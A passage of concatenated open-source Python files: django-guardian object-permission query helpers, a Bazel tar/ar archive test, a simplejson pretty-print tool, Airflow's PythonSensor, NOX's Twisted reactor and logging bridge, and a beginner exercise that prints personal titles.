ctype = ContentType.objects.get_for_model(model)
return Permission.objects.filter(content_type=ctype)
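# Illustrative calls: both forms below return the Permission queryset for the
# User model, since the string form is resolved through models.get_model:
#
#     get_perms_for_model(User)
#     get_perms_for_model('auth.User')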
def get_users_with_perms(obj, attach_perms=False, with_superusers=False,
with_group_users=True):
"""
Returns queryset of all ``User`` objects with *any* object permissions for
the given ``obj``.
:param obj: persisted Django's ``Model`` instance
:param attach_perms: Default: ``False``. If set to ``True`` result would be
dictionary of ``User`` instances with permissions' codenames list as
values. This would fetch users eagerly!
:param with_superusers: Default: ``False``. If set to ``True`` result would
contain all superusers.
:param with_group_users: Default: ``True``. If set to ``False`` result would
**not** contain those users who have only group permissions for given
``obj``.
Example::
>>> from django.contrib.auth.models import User
>>> from django.contrib.flatpages.models import FlatPage
>>> from guardian.shortcuts import assign, get_users_with_perms
>>>
>>> page = FlatPage.objects.create(title='Some page', path='/some/page/')
>>> joe = User.objects.create_user('joe', '[email protected]', 'joesecret')
>>> assign('change_flatpage', joe, page)
>>>
>>> get_users_with_perms(page)
[<User: joe>]
>>>
>>> get_users_with_perms(page, attach_perms=True)
{<User: joe>: [u'change_flatpage']}
"""
ctype = ContentType.objects.get_for_model(obj)
if not attach_perms:
# It's much easier without attached perms so we do it first if that is
# the case
qset = Q(
userobjectpermission__content_type=ctype,
userobjectpermission__object_pk=obj.pk)
if with_group_users:
qset = qset | Q(
groups__groupobjectpermission__content_type=ctype,
groups__groupobjectpermission__object_pk=obj.pk,
)
if with_superusers:
qset = qset | Q(is_superuser=True)
return User.objects.filter(qset).distinct()
else:
# TODO: Do not hit db for each user!
users = {}
for user in get_users_with_perms(obj,
with_group_users=with_group_users):
users[user] = get_perms(user, obj)
return users
def get_groups_with_perms(obj, attach_perms=False):
"""
Returns queryset of all ``Group`` objects with *any* object permissions for
the given ``obj``.
:param obj: persisted Django's ``Model`` instance
:param attach_perms: Default: ``False``. If set to ``True`` result would be
dictionary of ``Group`` instances with permissions' codenames list as
values. This would fetch groups eagerly!
Example::
>>> from django.contrib.auth.models import Group
>>> from django.contrib.flatpages.models import FlatPage
>>> from guardian.shortcuts import assign, get_groups_with_perms
>>>
>>> page = FlatPage.objects.create(title='Some page', path='/some/page/')
    >>> admins = Group.objects.create(name='admins')
    >>> assign('change_flatpage', admins, page)
>>>
>>> get_groups_with_perms(page)
[<Group: admins>]
>>>
>>> get_groups_with_perms(page, attach_perms=True)
{<Group: admins>: [u'change_flatpage']}
"""
ctype = ContentType.objects.get_for_model(obj)
if not attach_perms:
# It's much easier without attached perms so we do it first if that is
# the case
groups = Group.objects\
.filter(
groupobjectpermission__content_type=ctype,
groupobjectpermission__object_pk=obj.pk,
)\
.distinct()
return groups
else:
# TODO: Do not hit db for each group!
groups = {}
for group in get_groups_with_perms(obj):
if not group in groups:
groups[group] = get_perms(group, obj)
return groups
def get_objects_for_user(user, perms, klass=None, use_groups=True, any_perm=False):
"""
Returns queryset of objects for which a given ``user`` has *all*
permissions present at ``perms``.
:param user: ``User`` instance for which objects would be returned
:param perms: single permission string, or sequence of permission strings
which should be checked.
If ``klass`` parameter is not given, those should be full permission
names rather than only codenames (i.e. ``auth.change_user``). If more than
one permission is present within sequence, their content type **must** be
the same or ``MixedContentTypeError`` exception would be raised.
:param klass: may be a Model, Manager or QuerySet object. If not given
this parameter would be computed based on given ``params``.
:param use_groups: if ``False``, wouldn't check user's groups object
permissions. Default is ``True``.
:param any_perm: if True, any of permission in sequence is accepted
:raises MixedContentTypeError: when computed content type for ``perms``
and/or ``klass`` clashes.
:raises WrongAppError: if cannot compute app label for given ``perms``/
``klass``.
Example::
>>> from guardian.shortcuts import get_objects_for_user
>>> joe = User.objects.get(username='joe')
>>> get_objects_for_user(joe, 'auth.change_group')
[]
>>> from guardian.shortcuts import assign
    >>> group = Group.objects.create(name='some group')
>>> assign('auth.change_group', joe, group)
>>> get_objects_for_user(joe, 'auth.change_group')
[<Group some group>]
The permission string can also be an iterable. Continuing with the previous example:
>>> get_objects_for_user(joe, ['auth.change_group', 'auth.delete_group'])
[]
>>> get_objects_for_user(joe, ['auth.change_group', 'auth.delete_group'], any_perm=True)
[<Group some group>]
>>> assign('auth.delete_group', joe, group)
>>> get_objects_for_user(joe, ['auth.change_group', 'auth.delete_group'])
[<Group some group>]
"""
if isinstance(perms, basestring):
perms = [perms]
ctype = None
app_label = None
codenames = set()
# Compute codenames set and ctype if possible
for perm in perms:
if '.' in perm:
new_app_label, codename = perm.split('.', 1)
if app_label is not None and app_label != new_app_label:
raise MixedContentTypeError("Given perms must have same app "
"label (%s != %s)" % (app_label, new_app_label))
else:
app_label = new_app_label
else:
codename = perm
codenames.add(codename)
if app_label is not None:
new_ctype = ContentType.objects.get(app_label=app_label,
permission__codename=codename)
if ctype is not None and ctype != new_ctype:
raise MixedContentTypeError("ContentType was once computed "
"to be %s and another one %s" % (ctype, new_ctype))
else:
ctype = new_ctype
# Compute queryset and ctype if still missing
if ctype is None and klass is None:
raise WrongAppError("Cannot determine content type")
elif ctype is None and klass is not None:
queryset = _get_queryset(klass)
ctype = ContentType.objects.get_for_model(queryset.model)
elif ctype is not None and klass is None:
queryset = _get_queryset(ctype.model_class())
else:
queryset = _get_queryset(klass)
if ctype.model_class() != queryset.model:
raise MixedContentTypeError("Content type for given perms and "
"klass differs")
# At this point, we should have both ctype and queryset and they should
# match which means: ctype.model_class() == queryset.model
# we should also have ``codenames`` list
# First check if user is superuser and if so, return queryset immediately
if user.is_superuser:
return queryset
# Now we should extract list of pk values for which we would filter queryset
user_obj_perms = UserObjectPermission.objects\
.filter(user=user)\
.filter(permission__content_type=ctype)\
.filter(permission__codename__in=codenames)\
.values_list('object_pk', 'permission__codename')
data = list(user_obj_perms)
if use_groups:
groups_obj_perms = GroupObjectPermission.objects\
.filter(group__user=user)\
.filter(permission__content_type=ctype)\
.filter(permission__codename__in=codenames)\
.values_list('object_pk', 'permission__codename')
data += list(groups_obj_perms)
keyfunc = lambda t: t[0] # sorting/grouping by pk (first in result tuple)
data = sorted(data, key=keyfunc)
pk_list = []
for pk, group in groupby(data, keyfunc):
obj_codenames = set((e[1] for e in group))
if any_perm or codenames.issubset(obj_codenames):
pk_list.append(pk)
objects = queryset.filter(pk__in=pk_list)
return objects
def get_objects_for_group(group, perms, klass=None, any_perm=False):
"""
Returns queryset of objects for which a given ``group`` has *all*
permissions present at ``perms``.
:param group: ``Group`` instance for which objects would be returned.
:param perms: single permission string, or sequence of permission strings
which should be checked.
If ``klass`` parameter is not given, those should be full permission
names rather than only codenames (i.e. ``auth.change_user``). If more than
one permission is present within sequence, their content type **must** be
the same or ``MixedContentTypeError`` exception would be raised.
:param klass: may be a Model, Manager or QuerySet object. If not given
this parameter would be computed based on given ``params``.
:param any_perm: if True, any of permission in sequence is accepted
:raises MixedContentTypeError: when computed content type for ``perms``
and/or ``klass`` clashes.
:raises WrongAppError: if cannot compute app label for given ``perms``/
``klass``.
Example:
Let's assume we have a ``Task`` model belonging to the ``tasker`` app with
the default add_task, change_task and delete_task permissions provided
by Django::
>>> from guardian.shortcuts import get_objects_for_group
>>> from tasker import Task
    >>> group = Group.objects.create(name='some group')
>>> task = Task.objects.create('some task')
>>> get_objects_for_group(group, 'tasker.add_task')
[]
>>> from guardian.shortcuts import assign
>>> assign('tasker.add_task', group, task)
>>> get_objects_for_group(group, 'tasker.add_task')
[<Task some task>]
The permission string can also be an iterable. Continuing with the previous example:
>>> get_objects_for_group(group, ['tasker.add_task', 'tasker.delete_task'])
[]
>>> assign('tasker.delete_task', group, task)
>>> get_objects_for_group(group, ['tasker.add_task', 'tasker.delete_task'])
[<Task some task>]
"""
if isinstance(perms, basestring):
perms = [perms]
ctype = None
app_label = None
codenames = set()
# Compute codenames set and ctype if possible
for perm in perms:
if '.' in perm:
new_app_label, codename = perm.split('.', 1)
if app_label is not None and app_label != new_app_label:
raise MixedContentTypeError("Given perms must have same app "
"label (%s != %s)" % (app_label, new_app_label))
else:
app_label = new_app_label
else:
codename = perm
codenames.add(codename)
if app_label is not None:
new_ctype = ContentType.objects.get(app_label=app_label,
permission__codename=codename)
if ctype is not None and ctype != new_ctype:
raise MixedContentTypeError("ContentType was once computed "
"to be %s and another one %s" % (ctype, new_ctype))
else:
ctype = new_ctype
# Compute queryset and ctype if still missing
if ctype is None and klass is None:
raise WrongAppError("Cannot determine content type")
elif ctype is None and klass is not None:
queryset = _get_queryset(klass)
ctype = ContentType.objects.get_for_model(queryset.model)
elif ctype is not None and klass is None:
queryset = _get_queryset(ctype.model_class())
else:
queryset = _get_queryset(klass)
if ctype.model_class() != queryset.model:
raise MixedContentTypeError("Content type for given perms and "
"klass differs")
# At this point, we should have both ctype and queryset and they should
# match which means: ctype.model_class() == queryset.model
# we should also have ``codenames`` list
# Now we should extract list of pk values for which we would filter queryset
groups_obj_perms = GroupObjectPermission.objects\
.filter(group=group)\
.filter(permission__content_type=ctype)\
.filter(permission__codename__in=codenames)\
.values_list('object_pk', 'permission__codename')
data = list(groups_obj_perms)
keyfunc = lambda t: t[0] # sorting/grouping by pk (first in result tuple)
data = sorted(data, key=keyfunc)
pk_list = []
for pk, group in groupby(data, keyfunc):
obj_codenames = set((e[1] for e in group))
if any_perm or codenames.issubset(obj_codenames):
pk_list.append(pk)
objects = queryset.filter(pk__in=pk_list)
return objects
|
snnn/bazel | refs/heads/master | tools/build_defs/pkg/archive_test.py | 24 | # Copyright 2015 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Testing for archive."""
import os
import os.path
import tarfile
import unittest
from tools.build_defs.pkg import archive
from tools.build_defs.pkg import testenv
class SimpleArFileTest(unittest.TestCase):
"""Testing for SimpleArFile class."""
def assertArFileContent(self, arfile, content):
"""Assert that arfile contains exactly the entry described by `content`.
Args:
arfile: the path to the AR file to test.
content: an array describing the expected content of the AR file.
Each entry in that list should be a dictionary where each field
is a field to test in the corresponding SimpleArFileEntry. For
testing the presence of a file "x", then the entry could simply
be `{"filename": "x"}`, the missing field will be ignored.
"""
with archive.SimpleArFile(arfile) as f:
current = f.next()
i = 0
while current:
error_msg = "Extraneous file at end of archive %s: %s" % (
arfile,
current.filename
)
self.assertTrue(i < len(content), error_msg)
for k, v in content[i].items():
value = getattr(current, k)
error_msg = " ".join([
"Value `%s` for key `%s` of file" % (value, k),
"%s in archive %s does" % (current.filename, arfile),
"not match expected value `%s`" % v
])
self.assertEqual(value, v, error_msg)
current = f.next()
i += 1
if i < len(content):
self.fail("Missing file %s in archive %s" % (content[i], arfile))
def testEmptyArFile(self):
self.assertArFileContent(os.path.join(testenv.TESTDATA_PATH, "empty.ar"),
[])
def assertSimpleFileContent(self, names):
datafile = os.path.join(testenv.TESTDATA_PATH, "_".join(names) + ".ar")
content = [{"filename": n, "size": len(n), "data": n} for n in names]
self.assertArFileContent(datafile, content)
def testAFile(self):
self.assertSimpleFileContent(["a"])
def testBFile(self):
self.assertSimpleFileContent(["b"])
def testABFile(self):
self.assertSimpleFileContent(["ab"])
def testA_BFile(self):
self.assertSimpleFileContent(["a", "b"])
def testA_ABFile(self):
self.assertSimpleFileContent(["a", "ab"])
def testA_B_ABFile(self):
self.assertSimpleFileContent(["a", "b", "ab"])
class TarFileWriterTest(unittest.TestCase):
"""Testing for TarFileWriter class."""
def assertTarFileContent(self, tar, content):
"""Assert that tarfile contains exactly the entry described by `content`.
Args:
tar: the path to the TAR file to test.
content: an array describing the expected content of the TAR file.
Each entry in that list should be a dictionary where each field
is a field to test in the corresponding TarInfo. For
testing the presence of a file "x", then the entry could simply
be `{"name": "x"}`, the missing field will be ignored. To match
the content of a file entry, use the key "data".
"""
with tarfile.open(tar, "r:") as f:
i = 0
for current in f:
error_msg = "Extraneous file at end of archive %s: %s" % (
tar,
current.name
)
self.assertTrue(i < len(content), error_msg)
for k, v in content[i].items():
if k == "data":
value = f.extractfile(current).read()
else:
value = getattr(current, k)
error_msg = " ".join([
"Value `%s` for key `%s` of file" % (value, k),
"%s in archive %s does" % (current.name, tar),
"not match expected value `%s`" % v
])
self.assertEqual(value, v, error_msg)
i += 1
if i < len(content):
self.fail("Missing file %s in archive %s" % (content[i], tar))
def setUp(self):
self.tempfile = os.path.join(os.environ["TEST_TMPDIR"], "test.tar")
def tearDown(self):
if os.path.exists(self.tempfile):
os.remove(self.tempfile)
def testEmptyTarFile(self):
with archive.TarFileWriter(self.tempfile):
pass
self.assertTarFileContent(self.tempfile, [])
def assertSimpleFileContent(self, names):
with archive.TarFileWriter(self.tempfile) as f:
for n in names:
f.add_file(n, content=n)
content = ([{"name": "."}] + [{"name": n,
"size": len(n),
"data": n} for n in names])
self.assertTarFileContent(self.tempfile, content)
def testAddFile(self):
self.assertSimpleFileContent(["./a"])
self.assertSimpleFileContent(["./b"])
self.assertSimpleFileContent(["./ab"])
self.assertSimpleFileContent(["./a", "./b"])
self.assertSimpleFileContent(["./a", "./ab"])
self.assertSimpleFileContent(["./a", "./b", "./ab"])
def testDottedFiles(self):
with archive.TarFileWriter(self.tempfile) as f:
f.add_file("a")
f.add_file("/b")
f.add_file("./c")
f.add_file("./.d")
f.add_file("..e")
f.add_file(".f")
content = [
{"name": "."}, {"name": "./a"}, {"name": "/b"}, {"name": "./c"},
{"name": "./.d"}, {"name": "./..e"}, {"name": "./.f"}
]
self.assertTarFileContent(self.tempfile, content)
def testAddDir(self):
# For some strange reason, ending slash is stripped by the test
content = [
{"name": ".", "mode": 0o755},
{"name": "./a", "mode": 0o755},
{"name": "./a/b", "data": "ab", "mode": 0o644},
{"name": "./a/c", "mode": 0o755},
{"name": "./a/c/d", "data": "acd", "mode": 0o644},
]
tempdir = os.path.join(os.environ["TEST_TMPDIR"], "test_dir")
# Iterate over the `content` array to create the directory
# structure it describes.
for c in content:
if "data" in c:
p = os.path.join(tempdir, c["name"][2:])
os.makedirs(os.path.dirname(p))
with open(p, "w") as f:
f.write(c["data"])
with archive.TarFileWriter(self.tempfile) as f:
f.add_dir("./", tempdir, mode=0o644)
self.assertTarFileContent(self.tempfile, content)
def testMergeTar(self):
content = [
{"name": "./a", "data": "a"},
{"name": "./ab", "data": "ab"},
]
for ext in ["", ".gz", ".bz2", ".xz"]:
with archive.TarFileWriter(self.tempfile) as f:
f.add_tar(os.path.join(testenv.TESTDATA_PATH, "tar_test.tar" + ext),
name_filter=lambda n: n != "./b")
self.assertTarFileContent(self.tempfile, content)
def testMergeTarRelocated(self):
content = [
{"name": ".", "mode": 0o755},
{"name": "./foo", "mode": 0o755},
{"name": "./foo/a", "data": "a"},
{"name": "./foo/ab", "data": "ab"},
]
with archive.TarFileWriter(self.tempfile) as f:
f.add_tar(os.path.join(testenv.TESTDATA_PATH, "tar_test.tar"),
name_filter=lambda n: n != "./b", root="/foo")
self.assertTarFileContent(self.tempfile, content)
def testAddingDirectoriesForFile(self):
with archive.TarFileWriter(self.tempfile) as f:
f.add_file("d/f")
content = [
{"name": ".",
"mode": 0o755},
{"name": "./d",
"mode": 0o755},
{"name": "./d/f"},
]
self.assertTarFileContent(self.tempfile, content)
def testAddingDirectoriesForFileSeparately(self):
d_dir = os.path.join(os.environ["TEST_TMPDIR"], "d_dir")
os.makedirs(d_dir)
with open(os.path.join(d_dir, "dir_file"), "w"):
pass
a_dir = os.path.join(os.environ["TEST_TMPDIR"], "a_dir")
os.makedirs(a_dir)
with open(os.path.join(a_dir, "dir_file"), "w"):
pass
with archive.TarFileWriter(self.tempfile) as f:
f.add_dir("d", d_dir)
f.add_file("d/f")
f.add_dir("a", a_dir)
f.add_file("a/b/f")
content = [
{"name": ".",
"mode": 0o755},
{"name": "./d",
"mode": 0o755},
{"name": "./d/dir_file"},
{"name": "./d/f"},
{"name": "./a",
"mode": 0o755},
{"name": "./a/dir_file"},
{"name": "./a/b",
"mode": 0o755},
{"name": "./a/b/f"},
]
self.assertTarFileContent(self.tempfile, content)
def testAddingDirectoriesForFileManually(self):
with archive.TarFileWriter(self.tempfile) as f:
f.add_file("d", tarfile.DIRTYPE)
f.add_file("d/f")
f.add_file("a", tarfile.DIRTYPE)
f.add_file("a/b", tarfile.DIRTYPE)
f.add_file("a/b", tarfile.DIRTYPE)
f.add_file("a/b/", tarfile.DIRTYPE)
f.add_file("a/b/c/f")
f.add_file("x/y/f")
f.add_file("x", tarfile.DIRTYPE)
content = [
{"name": ".",
"mode": 0o755},
{"name": "./d",
"mode": 0o755},
{"name": "./d/f"},
{"name": "./a",
"mode": 0o755},
{"name": "./a/b",
"mode": 0o755},
{"name": "./a/b/c",
"mode": 0o755},
{"name": "./a/b/c/f"},
{"name": "./x",
"mode": 0o755},
{"name": "./x/y",
"mode": 0o755},
{"name": "./x/y/f"},
]
self.assertTarFileContent(self.tempfile, content)
if __name__ == "__main__":
unittest.main()
|
salomon1184/bite-project | refs/heads/master | deps/mrtaskman/server/mapreduce/lib/pipeline/simplejson/tool.py | 43 | #!/usr/bin/env python
r"""Command-line tool to validate and pretty-print JSON
Usage::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expecting property name: line 1 column 2 (char 2)
"""
import sys
from mapreduce.lib import simplejson as json
def main():
if len(sys.argv) == 1:
infile = sys.stdin
outfile = sys.stdout
elif len(sys.argv) == 2:
infile = open(sys.argv[1], 'rb')
outfile = sys.stdout
elif len(sys.argv) == 3:
infile = open(sys.argv[1], 'rb')
outfile = open(sys.argv[2], 'wb')
else:
raise SystemExit(sys.argv[0] + " [infile [outfile]]")
try:
obj = json.load(infile,
object_pairs_hook=json.OrderedDict,
use_decimal=True)
except ValueError, e:
raise SystemExit(e)
json.dump(obj, outfile, sort_keys=True, indent=' ', use_decimal=True)
outfile.write('\n')
if __name__ == '__main__':
main()
|
sekikn/incubator-airflow | refs/heads/master | airflow/sensors/python.py | 5 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Callable, Dict, List, Optional
from airflow.sensors.base import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
from airflow.utils.operator_helpers import determine_kwargs
class PythonSensor(BaseSensorOperator):
"""
Waits for a Python callable to return True.
    The user can pass input arguments via ``templates_dict``,
    e.g. ``templates_dict = {'start_ds': 1970}``,
    and access them in the callable via
    ``kwargs['templates_dict']['start_ds']``.
:param python_callable: A reference to an object that is callable
:type python_callable: python callable
:param op_kwargs: a dictionary of keyword arguments that will get unpacked
in your function
:type op_kwargs: dict
:param op_args: a list of positional arguments that will get unpacked when
calling your callable
:type op_args: list
:param templates_dict: a dictionary where the values are templates that
will get templated by the Airflow engine sometime between
``__init__`` and ``execute`` takes place and are made available
in your callable's context after the template has been applied.
:type templates_dict: dict of str
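    Example (illustrative sketch; ``check_flag`` and the task id are made-up
    names)::
        def check_flag(**kwargs):
            # templated values are exposed to the callable as
            # kwargs['templates_dict']
            return kwargs['templates_dict']['start_ds'] == 1970
        wait_for_flag = PythonSensor(
            task_id='wait_for_flag',
            python_callable=check_flag,
            templates_dict={'start_ds': 1970},
        )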
"""
template_fields = ('templates_dict', 'op_args', 'op_kwargs')
@apply_defaults
def __init__(
self,
*,
python_callable: Callable,
op_args: Optional[List] = None,
op_kwargs: Optional[Dict] = None,
templates_dict: Optional[Dict] = None,
**kwargs,
):
super().__init__(**kwargs)
self.python_callable = python_callable
self.op_args = op_args or []
self.op_kwargs = op_kwargs or {}
self.templates_dict = templates_dict
def poke(self, context: Dict):
context.update(self.op_kwargs)
context['templates_dict'] = self.templates_dict
self.op_kwargs = determine_kwargs(self.python_callable, self.op_args, context)
self.log.info("Poking callable: %s", str(self.python_callable))
return_value = self.python_callable(*self.op_args, **self.op_kwargs)
return bool(return_value)
|
bigswitch/snac-nox-zaku | refs/heads/zaku | src/nox/coreapps/pyrt/pyoxidereactor.py | 3 | # Copyright 2008 (C) Nicira, Inc.
#
# This file is part of NOX.
#
# NOX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# NOX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NOX. If not, see <http://www.gnu.org/licenses/>.
#
# Reactor for plugging twisted into the vigil main loop. Uses
# oxidereactorglue under the covers to register file descriptors.
#
import signal
import nox.lib.core
import oxidereactor
import twisted
import logging, types
from twisted.internet import base, error, interfaces, posixbase, task
from twisted.internet.interfaces import IResolverSimple
from twisted.internet.process import reapAllProcesses
from twisted.python.runtime import seconds
from twisted.python import log, reflect
from zope.interface import implements
def doRead(reader, reactor):
why = None
why = reader.doRead()
if why:
twisted.internet.reactor._disconnectSelectable(reader, why, 1)
reactor.callPendingThreadCalls()
def doWrite(writer, reactor):
why = None
why = writer.doWrite()
if why:
twisted.internet.reactor._disconnectSelectable(writer, why, 0)
reactor.callPendingThreadCalls()
class DelayedCallWrapper(base.DelayedCall):
def __init__(self, delay, func, args, kw):
base.DelayedCall.__init__(self, delay, func, args, kw, None, None)
self.dc = oxidereactor.delayedcall()
def delay(self, secondsLater):
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
if secondsLater < 0:
self.dc.delay(True, long(-secondsLater),
long(-secondsLater * 1000 % 1000))
else:
self.dc.delay(False, long(secondsLater),
long(secondsLater * 1000 % 1000))
def reset(self, secondsFromNow):
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
self.dc.reset(long(secondsFromNow),
long(secondsFromNow * 1000 % 1000))
def cancel(self):
if self.cancelled:
raise error.AlreadyCancelled
elif self.called:
raise error.AlreadyCalled
self.cancelled = 1
self.dc.cancel()
def __call__(self):
try:
self.called = 1
self.func(*self.args, **self.kw);
except:
log.deferr()
if hasattr(self, "creator"):
e = "\n"
e += " C: previous exception occurred in " + \
"a DelayedCall created here:\n"
e += " C:"
e += "".join(self.creator).rstrip().replace("\n","\n C:")
e += "\n"
log.msg(e)
class Resolver:
implements (IResolverSimple)
def __init__(self, oreactor):
self.oreactor = oreactor
def getHostByName(self, name, timeout = (1, 3, 11, 45)):
from twisted.internet.defer import Deferred
d = Deferred()
self.oreactor.resolve(name, d.callback)
def query_complete(address, name):
if address is None or address == "":
from twisted.internet import error
msg = "address %r not found" % (name,)
err = error.DNSLookupError(msg)
from twisted.internet import defer
return defer.fail(err)
else:
return address
return d.addCallback(query_complete, name)
class pyoxidereactor (posixbase.PosixReactorBase):
def __init__(self, ctxt):
from twisted.internet.main import installReactor
self.oreactor = oxidereactor.oxidereactor(ctxt, "oxidereactor")
posixbase.PosixReactorBase.__init__(self)
installReactor(self)
self.installResolver(Resolver(self.oreactor))
signal.signal(signal.SIGCHLD, self._handleSigchld)
# Twisted uses os.waitpid(pid, WNOHANG) but doesn't try again
# if the call returns nothing (since not being able to block).
# Poll once a second on behalf of Twisted core to detect child
# processes dying properly.
task.LoopingCall(reapAllProcesses).start(1)
# The removeReader, removeWriter, addReader, and addWriter
# functions must be implemented, because they are used extensively
# by Python code.
def removeReader(self, reader):
self.oreactor.removeReader(reader.fileno())
def removeWriter(self, writer):
self.oreactor.removeWriter(writer.fileno())
def addReader(self, reader):
self.oreactor.addReader(reader.fileno(), reader,
lambda reader: doRead(reader, self))
def addWriter(self, writer):
self.oreactor.addWriter(writer.fileno(), writer,
lambda writer: doWrite(writer, self))
# doIteration is called from PosixReactorBase.mainLoop
# which is called from PosixReactorBase.run
# and we never call either one.
# doIteration is also called from ReactorBase.iterate,
# which we never call.
# So it seems questionable whether we have to implement this.
# For now, stub it out.
def doIteration(self, delay=0):
raise NotImplementedError()
# stop is called from ReactorBase.sigInt,
# which is called upon receipt of SIGINT
# only if PosixReactorBase.startRunning is allowed to install
# signal handlers. It seems uncertain, at best, that we'll
# want Python to handle our signals.
def stop(self):
raise NotImplementedError()
# removeAll is called from ReactorBase.disconnectAll
# which is called indirectly from stop
# which we concluded above doesn't get called in our system.
# So there's no need to implement it.
def removeAll(self):
raise NotImplementedError()
# IReactorTime interface for timer management
def callLater(self, delay, f, *args, **kw):
if not callable(f):
raise TypeError("'f' object is not callable")
tple = DelayedCallWrapper(delay, f, args, kw)
self.oreactor.callLater(long(tple.getTime()),
long(tple.getTime() * 1000000 % 1000000),
tple);
return tple
def getDelayedCalls(self):
raise NotImplementedError()
# Calls to be invoked in the reactor thread
def callPendingThreadCalls(self):
if self.threadCallQueue:
count = 0
total = len(self.threadCallQueue)
for (f, a, kw) in self.threadCallQueue:
try:
f(*a, **kw)
except:
log.err()
count += 1
if count == total:
break
del self.threadCallQueue[:count]
if self.threadCallQueue:
if self.waker:
self.waker.wakeUp()
class vlog(log.FileLogObserver):
"""
Passes Twisted log messages to the C++ vlog.
"""
def __init__(self, v):
log.FileLogObserver.__init__(self, log.NullFile())
self.modules = {}
self.v = v
def __call__(self, event):
msg = event['message']
if not msg:
if event['isError'] and event.has_key('failure'):
msg = ((event.get('why') or 'Unhandled Error')
+ '\n' + event['failure'].getTraceback())
elif event.has_key('format'):
if hasattr(self, '_safeFormat'):
msg = self._safeFormat(event['format'], event)
else:
msg = log._safeFormat(event['format'], event)
else:
return
else:
msg = ' '.join(map(reflect.safe_str, msg))
try:
module = event['system']
# Initialize the vlog modules on-demand, since systems are
# not initialized explicitly in the Twisted logging API.
if not self.modules.has_key(module):
if module == '-':
module = 'reactor'
self.modules['-'] = self.v.mod_init(module)
self.modules[module] = self.modules['-']
else:
self.modules[module] = self.v.mod_init(module)
# vlog module identifier
module = self.modules[module]
fmt = {'system': module, 'msg': msg.replace("\n", "\n\t")}
if hasattr(self, '_safeFormat'):
msg = self._safeFormat("%(msg)s", fmt)
else:
msg = log._safeFormat("%(msg)s", fmt)
if event["isError"]:
self.v.err(module, msg)
else:
self.v.msg(module, msg)
except Exception, e:
# Can't pass an exception, since then the observer would
# be disabled automatically.
pass
v = oxidereactor.vigillog()
log.startLoggingWithObserver(vlog(v), 0)
class VigilLogger(logging.Logger):
"""
Stores the C++ logger identifier.
"""
def __init__(self, name):
logging.Logger.__init__(self, name)
self.vigil_logger_id = v.mod_init(name)
def isEnabledFor(self, level):
if level < logging.DEBUG:
return v.is_dbg_enabled(self.vigil_logger_id)
elif level < logging.INFO:
return v.is_dbg_enabled(self.vigil_logger_id)
elif level < logging.WARN:
return v.is_info_enabled(self.vigil_logger_id)
elif level < logging.ERROR:
return v.is_warn_enabled(self.vigil_logger_id)
elif level < logging.FATAL:
return v.is_err_enabled(self.vigil_logger_id)
else:
return v.is_emer_enabled(self.vigil_logger_id)
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None):
"""
Inject the vigil logger id into a standard Python log record.
"""
rv = logging.Logger.makeRecord(self, name, level, fn, lno, msg, args,
exc_info, func, extra)
rv.__dict__['vigil_logger_id'] = self.vigil_logger_id
return rv
class VigilHandler(logging.Handler):
"""
A Python logging handler class which writes logging records, with
minimal formatting, to the C++ logging infrastructure.
"""
def __init__(self):
"""
Initialize the handler.
"""
logging.Handler.__init__(self)
def emit(self, record):
"""
Emit a record.
"""
try:
vigil_logger_id = record.__dict__['vigil_logger_id']
msg = self.format(record)
if record.levelno < logging.DEBUG:
o = v.dbg
elif record.levelno < logging.INFO:
o = v.dbg
elif record.levelno < logging.WARN:
o = v.info
elif record.levelno < logging.ERROR:
o = v.warn
elif record.levelno < logging.FATAL:
o = v.err
else:
o = v.fatal
fs = "%s"
if not hasattr(types, "UnicodeType"): #if no unicode support...
o(vigil_logger_id, fs % msg)
else:
if isinstance(msg, str):
#caller may have passed us an encoded byte string...
msg = unicode(msg, 'utf-8')
msg = msg.encode('utf-8')
o(vigil_logger_id, fs % msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def config():
vigil_handler = VigilHandler()
    fs = '%(message)s'
dfs = None
fmt = logging.Formatter(fs, dfs)
vigil_handler.setFormatter(fmt)
logging.root.addHandler(vigil_handler)
logging.root.setLevel(logging.DEBUG)
config()
logging.setLoggerClass(VigilLogger)
def getFactory():
class Factory:
def instance(self, ctxt):
return pyoxidereactor(ctxt)
return Factory()
|
YaniLozanov/Software-University | refs/heads/master | Python/PyCharm/04.Complex Conditional Statements/01. Personal Titles.py | 1 | # Problem:
# The first task of this topic is to write a console program that introduces age (decimal number) and
# gender ("m" or "f") and prints an address from among the following:
# -> "Mr." - male (gender "m") aged 16 or over
# -> "Master" - boy (sex "m") under 16 years of age
# -> "Ms." - woman (gender "f") aged 16 or over
# -> "Miss" - girl (gender "f") under 16 years of age
age = float(input())
sex = input()
if sex == "m":
if age >= 16:
print("Mr.")
else:
print("Master")
else:
if age >= 16:
print("Ms.")
else:
print("Miss")
|
